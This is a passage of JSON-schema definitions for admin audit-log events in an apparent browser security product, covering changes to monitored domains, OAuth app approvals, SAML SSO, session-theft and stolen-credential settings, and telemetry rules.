setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the \"Monitor all domains\" setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_696"},"schema_697":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example added monitored domains"},"object":{"type":"string","enum":["MONITORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Monitored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_697"},"schema_698":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed monitored domains"},"object":{"type":"string","enum":["MONITORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Monitored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_698"},"schema_699":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com changed approval status for OAuth app Push Security to APPROVED"},"object":{"type":"string","enum":["OAUTH_APP_APPROVAL_STATUS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"OAuth app approval status updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"appId":{"type":"string","description":"The ID of the OAuth app.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"appName":{"type":"string","description":"Display name of the OAuth app at the time of the change.","example":"Push Security"},"approvalStatus":{"type":"string","description":"Approval status after the update.","enum":["NOT_REVIEWED","UNDER_REVIEW","APPROVED","NOT_APPROVED"]}},"required":["appId","appName","approvalStatus"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_699"},"schema_700":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set url masking to true"},"object":{"type":"string","enum":["PASSWORD_PROTECTION_HIDE_URLS_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Password protection URL masking toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the URL masking setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_700"},"schema_701":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com enabled ignoring work apps"},"object":{"type":"string","enum":["PASSWORD_PROTECTION_IGNORE_WORK_APPS_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Password protection ignore work apps toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the \"Ignore work apps\" setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_701"},"schema_702":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["PASSWORD_PROTECTION_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Password protection ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_702"},"schema_703":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["PASSWORD_PROTECTION_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Password protection ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_703"},"schema_704":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["PHISHING_TOOL_DETECTION_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing Tool Detection ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_704"},"schema_705":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["PHISHING_TOOL_DETECTION_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing Tool Detection ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_705"},"schema_706":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com has updated the apps where reused passwords are not raised."},"object":{"type":"string","enum":["REUSED_PASSWORD_EXCEPTIONS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Reused password exceptions updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that set the reused password exceptions."},"new":{"type":"object","properties":{"exceptions":{"type":"array","items":{"type":"string"},"description":"A list of the apps that will not raise reused password findings."}},"required":["exceptions"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_706"},"schema_707":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"john.hill@example.com generated an integration link for SAML SSO"},"object":{"type":"string","enum":["SAML_SSO_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SAML SSO added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"}},"required":["version","id","tenantId","timestamp","category","object","actor"]},"id":"schema_707"},"schema_708":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"SAML SSO connection completed"},"object":{"type":"string","enum":["SAML_SSO_COMPLETED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SAML SSO completed"}},"required":["version","id","tenantId","timestamp","category","object"]},"id":"schema_708"},"schema_709":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example updated the default role for SAML users to Full Access"},"object":{"type":"string","enum":["SAML_SSO_DEFAULT_ROLE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SAML SSO default role updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"role":{"$ref":"#/components/schemas/RoleType"}},"required":["role"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_709"},"schema_710":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example added session theft domains"},"object":{"type":"string","enum":["SESSION_THEFT_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Session theft domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_710"},"schema_711":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed session theft domains"},"object":{"type":"string","enum":["SESSION_THEFT_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Session theft domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_711"},"schema_712":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example rotated the session theft marker"},"object":{"type":"string","enum":["SESSION_THEFT_MARKER_ROTATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Session theft marker rotated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that rotated the marker."},"new":{"type":"object","properties":{"marker":{"type":"string","description":"The new value for the session theft marker."}},"required":["marker"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_712"},"schema_713":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added new stolen credentials"},"object":{"type":"string","enum":["STOLEN_CREDENTIALS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActorAPI","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"count":{"type":"integer","description":"The number of stolen credentials added.","example":10}},"required":["count"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_713"},"schema_714":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed stolen credentials"},"object":{"type":"string","enum":["STOLEN_CREDENTIALS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActorAPI","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"count":{"type":"integer","description":"The number of stolen credentials removed.","example":10}},"required":["count"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_714"},"schema_715":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set the mode to off"},"object":{"type":"string","enum":["STOLEN_CREDENTIALS_MODE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials mode updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the mode."},"new":{"type":"object","properties":{"mode":{"type":"string","description":"The current mode for the Stolen credentials feature."}},"required":["mode"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_715"},"schema_716":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["TELEMETRY_RULE_ADDED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Telemetry rule added"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added a telemetry rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the updated rule.","allOf":[{"$ref":"#/components/schemas/TelemetryRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_716"},"schema_717":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["TELEMETRY_RULE_UPDATED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Telemetry rule updated"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated a telemetry rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The current details of the updated rule.","allOf":[{"$ref":"#/components/schemas/TelemetryRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_717"},"schema_718":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["TELEMETRY_RULE_REMOVED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Telemetry rule removed"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a telemetry rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the removed rule.","allOf":[{"$ref":"#/components/schemas/TelemetryRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_718"},"schema_719":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["TELEMETRY_RULE_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Telemetry rule toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com enabled/disabled a telemetry rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the enabled/disabled rule.","allOf":[{"$ref":"#/components/schemas/TelemetryRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_719"},"schema_720":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["TELEMETRY_RULE_REORDERED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Telemetry rule reordered"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com reordered the telemetry rules"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"reorderedRule":{"description":"The details of the reordered rule.","allOf":[{"$ref":"#/components/schemas/TelemetryRule"}]},"previousRuleId":{"type":"string","format":"uuid","nullable":true,"description":"The unique identifier of the rule immediately before in precedence order. If null, the rule is now the first in the list.","example":"c478966c-f927-411c-b919-179832d3d50c"},"nextRuleId":{"type":"string","format":"uuid","nullable":true,"description":"The unique identifier of the rule immediately after in precedence order. If null, the rule is now the last in the list.","example":"c478966c-f927-411c-b919-179832d3d50c"}},"required":["reorderedRule","previousRuleId","nextRuleId"]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_720"},"schema_721":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs 